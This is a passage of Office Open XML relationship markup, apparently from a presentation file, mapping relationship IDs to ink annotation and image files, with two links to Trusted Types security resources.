Target="../ink/ink371.xml"/><Relationship Id="rId729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39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2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410.xml"/><Relationship Id="rId793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink431.xml"/><Relationship Id="rId807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink438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40.xml"/><Relationship Id="rId653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink361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2.xml"/><Relationship Id="rId709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink389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71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400.xml"/><Relationship Id="rId773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink421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1.xml"/><Relationship Id="rId829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink449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2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0.xml"/><Relationship Id="rId753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink411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2.xml"/><Relationship Id="rId809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink439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1.xml"/><Relationship Id="rId655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink362.xml"/><Relationship Id="rId697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink383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4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450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1.xml"/><Relationship Id="rId775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42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2.xml"/><Relationship Id="rId677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink373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4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1.xml"/><Relationship Id="rId755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink412.xml"/><Relationship Id="rId797" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink433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2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3.xml"/><Relationship Id="rId699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink384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1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5.xml"/><Relationship Id="rId777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink423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3.xml"/><Relationship Id="rId679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink374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1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3.xml"/><Relationship Id="rId799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink434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3.xml"/><Relationship Id="rId659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink364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5.xml"/><Relationship Id="rId737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink403.xml"/><Relationship Id="rId779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42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6.xml"/><Relationship Id="rId639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35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5.xml"/><Relationship Id="rId717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink393.xml"/><Relationship Id="rId759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41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4.xml"/><Relationship Id="rId770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3501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5.xml"/><Relationship Id="rId683" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink376.xml"/><Relationship Id="rId739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink40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5.xml"/><Relationship Id="rId817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink44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5.xml"/><Relationship Id="rId663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36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4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5.xml"/><Relationship Id="rId783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink42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.xml"/><Relationship Id="rId643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink356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7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5.xml"/><Relationship Id="rId763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink416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4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6.xml"/><Relationship Id="rId665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36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5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6.xml"/><Relationship Id="rId785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink427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.xml"/><Relationship Id="rId645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink357.xml"/><Relationship Id="rId687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink378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44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6.xml"/><Relationship Id="rId765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41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7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6.xml"/><Relationship Id="rId745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink407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0.xml"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink337.xml"/><Relationship Id="rId787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink428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8.xml"/><Relationship Id="rId689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink379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44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8.xml"/><Relationship Id="rId669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36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6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7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80.xml"/><Relationship Id="rId747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink408.xml"/><Relationship Id="rId789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink429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1.xml"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink338.xml"/><Relationship Id="rId649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink359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51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21.xml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43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30.xml"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/><Relationship Id="rId651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink360.xml"/><Relationship Id="rId749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink409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9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2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61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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image420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uth0.com/blog/securing-spa-with-trusted-types/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/w3c/trusted-types#polyfi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43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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink455.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink458.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink463.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink466.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink471.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink483.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink487.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink491.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink452.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image251.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink456.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink461.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink469.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink475.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink478.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink482.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink460.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink468.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink486.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink490.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink453.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink459.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink464.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink472.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink476.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink479.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink488.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink467.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink474.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink481.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink485.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink489.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink492.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink454.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink462.xml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41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink457.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink470.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink473.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink477.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480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480.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink484.xml"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3510.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink46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18.xml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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink526.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1611.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink539.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink547.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink558.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink565.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink587.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink573.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink508.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink521.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink534.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink497.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink501.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink542.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink550.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink555.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink582.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink568.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink516.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink529.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink537.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink545.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3710.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink561.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink577.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink563.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink574.xml"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink585.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink495.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink509.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink512.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink524.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink502.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink532.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink540.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink551.xml"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink556.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink571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1710.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink580.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink519.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink527.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink535.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink548.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink559.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink566.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink575.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink588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109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink513.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink503.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink510.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink522.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink530.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink543.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink498.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink552.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink569.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink583.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink493.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink514.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink517.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink525.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship 